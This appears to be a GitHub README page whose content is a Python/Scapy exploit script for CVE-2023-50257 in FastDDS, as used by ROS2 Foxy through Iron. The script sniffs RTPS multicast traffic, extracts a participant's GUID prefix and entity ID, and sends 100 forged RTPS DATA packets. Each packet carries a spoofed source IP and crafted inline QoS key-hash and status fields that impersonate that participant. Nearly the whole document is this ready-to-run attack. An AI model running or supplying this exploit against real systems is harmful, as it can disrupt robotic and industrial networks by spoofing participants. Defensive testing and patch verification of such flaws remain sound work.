README.md
Rendering markdown...
#!/usr/bin/env python3
import os, sys, time, binascii, struct
from scapy.all import sniff, sendp, Ether, IP, UDP, Raw, get_if_list
from scapy.contrib.rtps import *
# ================================
# Global Setting
# ================================
CAPTURE_DURATION = 5
ATTACK_PACKET_COUNT = 100
PACKET_INTERVAL = 0.1
MULTICAST_IP = "239.255.0.1"
MULTICAST_PORT = 7400
# ================================
def print_banner():
print(f"\033[95m=== CVE-2023-50257 TEST ===\033[0m")
print("Affected ROS2/DDS Version (FastDDS / RMW-FastDDS):")
print(" FOXY : 2.1.4 ↓ / 1.3.2 ↓")
print(" GALACTIC : 2.3.6 ↓ / 5.0.2 ↓")
print(" HUMBLE : 2.6.6 ↓ / 6.2.3 ↓")
print(" IRON : 2.10.2 ↓ / 7.1.1 ↓")
print()
def check_root():
if os.geteuid() != 0:
print(f"\033[91m[Error] Root privileges required.\033[0m")
sys.exit(1)
def start_capture():
print(f"\033[94m[*] Starting Packet Capture: {MULTICAST_IP}:{MULTICAST_PORT}\033[0m")
ifaces = [iface for iface in get_if_list() ]
pkts = sniff(
filter = f"host {MULTICAST_IP} and port {MULTICAST_PORT}",
iface = ifaces,
timeout = CAPTURE_DURATION,
store = True
)
for pkt in pkts:
if UDP in pkt and Raw in pkt and bytes(pkt[Raw].load).startswith(b"RTPS"):
return pkt, pkt.sniffed_on
print(f"\033[91m[Error] There no RTPS Packet on network.\033[0m")
sys.exit(1)
def extract_info(pkt):
"""Extract GUID prefix and Entity ID."""
data = bytes(pkt[Raw].load)
return {
'src_port': pkt[UDP].sport,
'guid_prefix': data[8:20],
'entity_id': data[44:48]
}
def define_rtps_classes(hostId, appId, instanceId, entityId):
class PacketSENTINEL(PIDPacketBase):
name = "PID_SENTINEL"
fields_desc = [ EField(XIntField("parameter_id", 0x0001), endianness=FORMAT_LE) ]
class participantId(EPacket):
name = "participantId"
fields_desc = [
XIntField("hostId", hostId),
XIntField("appId", appId),
XIntField("instanceId", instanceId),
XIntField("entity", entityId),
]
class participantId2(EPacket):
name = "participantId"
fields_desc = [
XIntField("hostId", hostId),
XIntField("appId", appId),
XIntField("instanceId", instanceId),
XIntField("entity", 0x00001c1),
]
class UnknownPacket(EPacket):
name = "Unknown"
fields_desc = [
EField(ShortField("parameter_id", 0x0083), endianness=FORMAT_LE),
EField(ShortField("parameter_length", 0x0018), endianness=FORMAT_LE),
PacketListField("participantId", [participantId()], participantId),
XIntField("parameter1",0), XIntField("parameter2",0x01000000),
]
class KeyHashPacket(EPacket):
name = "Data Packet"
fields_desc = [
EField(ShortField("parameter_id", 0x0070), endianness=FORMAT_LE),
EField(ShortField("parameter_length", 0x0010), endianness=FORMAT_LE),
PacketListField("participantId", [participantId2()], participantId2),
]
class StatusPacket(EPacket):
name = "status info"
fields_desc = [
EField(ShortField("parameter_id", 0x0071), endianness=FORMAT_LE),
EField(ShortField("parameter_length", 0x0004), endianness=FORMAT_LE),
XIntField("flags", 3),
]
class InlineQoSPacket(EPacket):
name = "Inline QoS"
fields_desc = [
PacketField("UnknownPacket", UnknownPacket(), UnknownPacket),
PacketField("KeyHashPacket", KeyHashPacket(), KeyHashPacket),
PacketField("StatusPacket", StatusPacket(), StatusPacket),
PacketField("sentinel", PacketSENTINEL(), PacketSENTINEL),
]
class RTPS(Packet):
name = "RTPS Header"
fields_desc = [
XIntField("magic", 0x52545053), XByteField("major", 2),
XByteField("minor", 3), XShortField("vendor_id",0x010f),
XIntField("hostId",hostId), XIntField("appId",appId),
XIntField("instanceId",instanceId),
]
class RTPSSubMessage_DATA(EPacket):
name = "RTPS DATA"
fields_desc = [
XByteField("submessageId1",0x09), XByteField("flags1",1),
ShortField("octetsToNextHeader1",0x0800),
XLongField("Timestamp",0x59000168c759aba0),
XByteField("submessageId2",0x15), XByteField("flags2",3),
ShortField("octetsToNextHeader2",0x5000),
XNBytesField("extraFlags",0,2),
EField(ShortField("octetsToInlineQoS",0x1000), endianness_from=e_flags),
X3BytesField("readerEntityIdKey",0x000100),
XByteField("readerEntityIdKind",0xc7),
X3BytesField("writerEntityIdKey",0x000100),
XByteField("writerEntityIdKind",0xc2),
EField(IntField("writerSeqNumHi",0), endianness_from=e_flags),
EField(IntField("writerSeqNumLow",0x02000000), endianness_from=e_flags),
PacketField("inline_qos", InlineQoSPacket(), InlineQoSPacket),
]
return RTPS, RTPSSubMessage_DATA
def send_attack(info, iface):
"""Build and send RTPS attack packets."""
gp = info['guid_prefix']
hostId, appId, instanceId = struct.unpack("!III", gp)
entityId = struct.unpack("!I", info['entity_id'])[0]
RTPS, RTPSSubMessage_DATA = define_rtps_classes(hostId, appId, instanceId, entityId)
pkt = (
Ether() /
IP(src="172.23.184.22", dst=MULTICAST_IP) /
UDP(sport=info['src_port'], dport=MULTICAST_PORT) /
RTPS() /
RTPSSubMessage_DATA()
)
print(f"\033[93m'[!] Send Attack RTPS packet...\033[0m")
sendp(pkt, iface=iface, count=ATTACK_PACKET_COUNT, inter=PACKET_INTERVAL)
print(f"\033[92m[+] Sent {ATTACK_PACKET_COUNT} packets.\033[0m")
if __name__ == "__main__":
print_banner()
check_root()
pkt, iface = start_capture()
info = extract_info(pkt)
print(f"[*] Found RTPS on interface: {iface}")
send_attack(info, iface)